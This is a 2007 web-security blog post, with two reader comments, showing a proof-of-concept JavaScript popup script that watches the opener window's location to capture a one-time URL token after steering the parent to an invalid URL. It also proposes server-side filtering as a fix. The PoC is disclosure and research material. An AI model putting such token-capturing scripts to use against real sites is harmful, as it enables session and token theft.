Friday, April 06, 2007

Onetime url implementation needs more server side protection

Don't read this post. I should not have published it.


I may be repeating things w.r.t. this here (it was hard to read the entire thread),

But following anti-poc works as of today.

<script>

var wnd = window.open ("");

wnd.document.open();

wnd.document.write("<head><script>window.setInterval(\"steal()\",5000);function steal(){alert(opener.location);}</" +"script></head><body></body>");

wnd.document.close();

url_randomizer.go('FileDoesNotExist');

</script>




The deal is simple.

  1. Open a new window
  2. Write code into this window that does following
    1. Registers a timer event and keeps watching the location of parent
    2. Grabs the token from parent's location
  3. Point your parent to an invalid URL or a URL thats not able to process this one time token.




how to prevent it? I think the best way is to process this token BEFORE request reaches the server code. Like using input filters etc. Do this processing for EVERY incoming request whether its an image, javascript, invalid resource, 3xx, 4xx, 5xx, whatever.


Note: Allow pop ups in order to this POC to work.



Back references:
http://wasjournal.blogspot.com/2007/03/one-time-urls-first-implementation.html
http://wasjournal.blogspot.com/2007/03/one-time-urls-broken-if-ajax-is-present.html

2 comments:

kuza55 said...

Just in relation to your crossing things out; You should have published it. We all make mistakes - it sucks when we do, but its inevitable - what's important is that we learn something from them. :)

Kishor said...

You are right.
Now I'll try even harder to break it.